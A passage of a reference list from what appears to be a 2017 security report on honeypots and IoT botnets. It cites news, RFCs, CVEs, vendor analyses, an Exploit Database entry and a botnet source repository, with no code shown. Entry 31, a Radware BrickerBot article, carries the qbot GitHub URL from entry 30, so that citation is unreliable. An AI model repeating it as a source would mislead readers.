2. Lily Hay Newman. 2017. What We Know About Friday’s Massive East Coast Internet Outage. Wired. [ONLINE] Available at: https://www.wired.com/2016/10/internet-outage-ddos-dns-dyn/. [Accessed 2 May 2017].
3. Lillian Ablon, Martin C. Libicki, Andrea A. Golay. 2017. Markets for Cybercrime Tools and Stolen Data. RAND. pp. 21-23. [ONLINE] Available at: https://www.rand.org/content/dam/rand/pubs/research_reports/RR600/RR610/RAND_RR610.pdf. [Accessed 2 May 2017].
4. CIRCL. 2017. BGP Ranking. [ONLINE] Available at: https://www.circl.lu/projects/bgpranking. [Accessed 13 May 2017].
5. CIRCL. 2016. Bgpranking-redis-api. [ONLINE] Available at: https://github.com/CIRCL/bgpranking-redis-api. [Accessed 13 May 2017].
6. William W. Martin. 2001. Honey Pots and Honey Nets - Security through Deception. SANS Institute. [ONLINE] Available at: https://www.sans.org/reading-room/whitepapers/attacking/honey-pots-honey-nets-security-deception-41. [Accessed 2 May 2017].
7. IETF. 1999. RFC 2616 - Hypertext Transfer Protocol. [ONLINE] Available at: https://tools.ietf.org/html/rfc2616. [Accessed 13 May 2017].
8. Ian Liu-Johnston. 2017. nodeJS_honeypot. [ONLINE] Available at: https://github.com/ianliu-johnston/nodeJS_honeypot. [Accessed 13 May 2017].
9. CVE. 2014. CVE-2014-6271. [ONLINE] Available at: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271. [Accessed 2 May 2017].
10. CVE. 2017. CVE-2017-5638. [ONLINE] Available at: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638. [Accessed 2 May 2017].
11. Exploit Database. 2017. Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution. [ONLINE] Available at: https://www.exploit-db.com/exploits/41570/. [Accessed 13 May 2017].
12. Terrence DeJesus. 2017. Apache Struts 2 Exploit Analysis. NTT Security. [ONLINE] Available at: https://www.solutionary.com/resource-center/blog/2017/03/apache-struts-2-exploit-analysis/. [Accessed 18 May 2017].
13. CXSecurity.com. 2017. Apache Struts Jakarta Multipart Parser OGNL Injection - CXSecurity.com. [ONLINE] Available at: https://cxsecurity.com/issue/WLB-2017030143. [Accessed 18 May 2017].
14. Pooler. 2017. cpuminer: CPU miner for Litecoin and Bitcoin. [ONLINE] Available at: https://github.com/pooler/cpuminer. [Accessed 18 May 2017].
15. IETF. 1983. RFC 854 - Telnet Protocol Specification. [ONLINE] Available at: https://tools.ietf.org/html/rfc854. [Accessed 13 May 2017].
16. Tim Britton and Holden Grissett. 2017. telnet-honeypot. [ONLINE] Available at: https://github.com/h-m-s/telnet-honeypot. [Accessed 13 May 2017].
17. Pierre Kim. 2017. Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in custom http server. [ONLINE] Available at: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html. [Accessed 2 May 2017].
18. John Costello, Allison Nixon, Brian Hein, Ronnie Tokazowski, Zach Wikholm. 2016. New Mirai Variant Leaves 5 Million Devices Worldwide Vulnerable — High Concentration in Germany, UK and Brazil. Flashpoint. [ONLINE] Available at: https://www.flashpoint-intel.com/blog/cybercrime/new-mirai-variant-involved-latest-deutsche-telekom-outage/. [Accessed 2 May 2017].
19. Roland Dobbins. 2016. Mirai IoT Botnet Description and DDoS Attack Mitigation. ARBOR Networks. [ONLINE] Available at: https://www.arbornetworks.com/blog/asert/mirai-iot-botnet-description-ddos-attack-mitigation/. [Accessed 2 May 2017].
20. IETF. 2002. RFC 3261 - Session Initiation Protocol. [ONLINE] Available at: https://tools.ietf.org/html/rfc3261. [Accessed 13 May 2017].
21. Cisco. 2014. SIPVicious SIP Auditing Tool Activity. [ONLINE] Available at: https://tools.cisco.com/security/center/viewAlert.x?alertId=33141. [Accessed 2 May 2017].
22. Kali Linux. 2014. SIPVicious Package Description. [ONLINE] Available at: http://tools.kali.org/sniffingspoofing/sipvicious. [Accessed 2 May 2017].
23. IETF. 2006. RFC 4253 - The Secure Shell (SSH) Transport Layer Protocol. [ONLINE] Available at: https://tools.ietf.org/html/rfc4253. [Accessed 13 May 2017].
24. Sam Edwards, Ioannis Profetis. 2016. Hajime: Analysis of a decentralized internet worm for IoT devices. [ONLINE] Available at: https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf. [Accessed 13 May 2017].
25. KrebsOnSecurity. 2016. KrebsOnSecurity Hit With Record DDoS. [ONLINE] Available at: https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-witth-record-ddos/. [Accessed 13 May 2017].
26. Dyn. 2016. Dyn Statement on 10/21/2016 DDoS Attack. [ONLINE] Available at: https://dyn.com/blog/dyn-statement-on-10212016-ddos-attack/. [Accessed 13 May 2017].
27. Octave Klaba. 2016. we got 2 huge multi DDoS: 1156Gbps then 901Gbps. [ONLINE] Available at: https://twitter.com/olesovhcom/status/778019962036314112. [Accessed 13 May 2017].
28. KrebsOnSecurity. 2017. Who is Anna-Senpai, the Mirai Worm Author?. [ONLINE] Available at: https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/. [Accessed 13 May 2017].
29. India Ashok. 2016. One million IoT devices infected by Bashlite malware-driven DDoS botnet. International Business Times. [ONLINE] Available at: https://www.ibtimes.co.uk/one-million-iot-devices-infected-by-bashlite-malware-driven-ddos-botnet-1578870. [Accessed 13 May 2017].
30. geniosa. 2016. qbot. [ONLINE] Available at: https://github.com/geniosa/qbot/blob/master/cc7.py.txt. [Accessed 13 May 2017].
31. Radware. 2017. ”BrickerBot” Results In PDoS Attack. [ONLINE] Available at: https://github.com/geniosa/qbot/blob/master/cc7.py.txt. [Accessed 13 May 2017].
32. Catalin Cimpanu. 2017. BrickerBot Author Claims He Bricked Two Million Devices. BleepingComputer. [ONLINE] Available at: https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/. [Accessed 13 May 2017].